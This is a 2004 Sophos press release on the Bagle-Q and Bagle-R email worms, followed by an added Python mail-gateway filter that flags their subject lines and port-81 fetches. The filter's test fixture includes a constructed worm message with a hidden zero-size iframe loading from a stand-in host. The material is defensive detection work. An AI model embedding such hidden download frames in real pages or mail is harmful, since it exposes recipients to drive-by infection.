Sophos warns of new twist in Bagle threat, as new variants emerge

March 18, 2004 Sophos Press Release

Sophos, a world leader in protecting businesses against viruses and spam, is warning of a new twist in the Bagle virus saga. Two new variants, W32/Bagle-Q and W32/Bagle-R, use a different method of infection in an attempt to bypass anti-virus protection at the email gateway.

Unlike most email viruses, the two new Bagle worms do not carry email attachments, making them difficult to spot. Infected messages have a random subject line chosen from the following list:

Re: Msg reply
Re: Hello
Re: Yahoo!
Re: Thank you!
Re: Thanks :)
RE: Text message
Re: Document
Incoming message
Re: Incoming Message
Re: Incoming Fax
Hidden message
Fax Message Received
Protected message
RE: Protected message
Forum notify
Request response
Site changes
Re: Hi
Encrypted document

If a user opens the message - and their version of Microsoft Outlook has not been patched against a five-month-old critical vulnerability - malicious code is automatically downloaded.

Once installed, the worms halt a wide range of security applications, potentially opening up your computer to further virus or hacker attack. The worm will also attempt to spread via file-sharing networks and infect other executable files.

"All computer users should be wary of this worm - we've already had reports from some parts of the world - particularly Korea, which is known for its uptake and use of technology," said Graham Cluley, senior technology consultant at Sophos. "Exploiting a security loophole in the popular Microsoft Outlook email system means these worms have the potential to hit hard. Both home and business computer users need to make sure they are patched against all vulnerabilities."

To prevent infection, Sophos recommends that users update their anti-virus software against the latest threats. Users should also patch against all security vulnerabilities.

Businesses can also protect themselves at their firewall, preventing computers on their network from downloading the worm from outside.

"Bagle is a wake-up call about the need for holistic security. By keeping on top of security patches, anti-virus software updates and ensuring firewalls are properly installed, users can lessen their chances of getting hit," continued Cluley. "If you don't patch yourself against these kinds of threats, you shouldn't be surprised if a worm bites you on the backside."

The patch against the Microsoft Outlook security vulnerability can be found at www.microsoft.com/technet/security/bulletin/MS03-040.mspx. Home users of Microsoft Windows can visit windowsupdate.microsoft.com to have their systems scanned for Microsoft security vulnerabilities.

Sophos recommends the following precautions against the W32/Bagle-Q and W32/Bagle-R worms:

  • Get and apply the latest Internet Explorer/Outlook Express patches from Microsoft. This prevents the automatic download of the virus.
  • Disallow connections to TCP port 81 through your network firewall. Blocking outbound port 81 connections stops computers on your network from downloading the worm from outside. Blocking inbound port 81 connections means that even if you do get infected you will not pass the virus on to others.
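The two signals the release gives a mail administrator are a subject line from the published list on a message with no attachment, and a download over TCP port 81 (the port it advises blocking). The following gateway check, an added example and not Sophos code, combines them: it parses a raw message, matches the subject against the Sophos list, notes the absence of any attachment, and looks for URLs carrying an explicit `:81` port in the body. The assumption that the worm is fetched from an HTTP server on port 81 is inferred from the firewall advice; the release does not show the actual message HTML. The three sample messages and the address 203.0.113.7 are constructed for the demo.

```python
"""Gateway heuristic for attachment-less Bagle-Q/R style mail.

Added example (not Sophos code). It combines the two signals the press
release gives: a subject line from the list Sophos published, no
attachment, and a body that pulls content from TCP port 81, the port
Sophos advises blocking. Sample messages are constructed; 203.0.113.7
is a documentation address.
"""
import email
import re
from email import policy

# Subject lines listed by Sophos for W32/Bagle-Q and W32/Bagle-R, compared
# case-insensitively because the list itself mixes "Re:" and "RE:".
BAGLE_SUBJECTS = frozenset(s.lower() for s in (
    "Re: Msg reply", "Re: Hello", "Re: Yahoo!", "Re: Thank you!",
    "Re: Thanks :)", "RE: Text message", "Re: Document", "Incoming message",
    "Re: Incoming Message", "Re: Incoming Fax", "Hidden message",
    "Fax Message Received", "Protected message", "RE: Protected message",
    "Forum notify", "Request response", "Site changes", "Re: Hi",
    "Encrypted document",
))

# URL whose host part carries an explicit :81 port. Assumption: the worm is
# fetched from an HTTP server on that port, which is why Sophos says to
# block it; the release does not show the exact HTML.
PORT81_URL = re.compile(r"https?://[^\s\"'<>/]+:81(?:/[^\s\"'<>]*)?", re.I)


def has_attachment(msg):
    """True if any MIME part is marked as an attachment."""
    return any(part.get_content_disposition() == "attachment"
               for part in msg.walk())


def port81_urls(msg):
    """Collect URLs on TCP port 81 from the text/html and text/plain parts."""
    found = []
    for part in msg.walk():
        if part.get_content_type() in ("text/html", "text/plain"):
            found.extend(PORT81_URL.findall(part.get_content()))
    return found


def assess(raw):
    """Return {'verdict': ..., 'reasons': [...]} for one raw RFC 822 message."""
    msg = email.message_from_bytes(raw, policy=policy.default)
    subject = str(msg["Subject"] or "").strip()
    reasons = []
    subject_hit = subject.lower() in BAGLE_SUBJECTS
    if subject_hit:
        reasons.append("subject on Bagle-Q/R list: %r" % subject)
    urls = port81_urls(msg)
    if urls:
        reasons.append("body fetches from TCP port 81: %s" % ", ".join(urls))
    attached = has_attachment(msg)
    if subject_hit and not attached:
        reasons.append("no attachment, consistent with Bagle-Q/R delivery")
    # Only the full combination is strong enough to quarantine; a listed
    # subject alone is an ordinary reply far more often than a worm.
    if subject_hit and urls and not attached:
        verdict = "quarantine"
    elif subject_hit or urls:
        verdict = "review"
    else:
        verdict = "pass"
    return {"verdict": verdict, "reasons": reasons}


# Constructed sample 1: listed subject, no attachment, hidden frame on :81.
SAMPLE_WORM = b"""From: sender@example.org
To: user@example.com
Subject: Re: Incoming Fax
MIME-Version: 1.0
Content-Type: text/html; charset="us-ascii"

<html><body>Your fax is ready.
<iframe src="http://203.0.113.7:81/" width="0" height="0"></iframe>
</body></html>
"""

# Constructed sample 2: listed subject, but a plain reply fetching nothing.
SAMPLE_REPLY = b"""From: colleague@example.com
To: user@example.com
Subject: Re: Hello
MIME-Version: 1.0
Content-Type: text/plain; charset="us-ascii"

Hi, yes, Tuesday works for me.
"""

# Constructed sample 3: ordinary subject with a real attachment.
SAMPLE_REPORT = b"""From: colleague@example.com
To: user@example.com
Subject: Q1 report
MIME-Version: 1.0
Content-Type: multipart/mixed; boundary="b1"

--b1
Content-Type: text/plain; charset="us-ascii"

Report attached.
--b1
Content-Type: application/octet-stream
Content-Disposition: attachment; filename="q1.xls"
Content-Transfer-Encoding: base64

AAAA
--b1--
"""

if __name__ == "__main__":
    for name, raw in (("worm", SAMPLE_WORM), ("reply", SAMPLE_REPLY),
                      ("report", SAMPLE_REPORT)):
        result = assess(raw)
        print(name, result["verdict"], *result["reasons"], sep="\n  ")
```

The verdict tiers matter in practice: the subject list is made of ordinary reply lines, so a subject match on its own should route to review rather than quarantine, while the combination of listed subject, no attachment and a port-81 fetch is specific enough to hold the message. The firewall rule in the bullet above remains the backstop for messages this filter never sees.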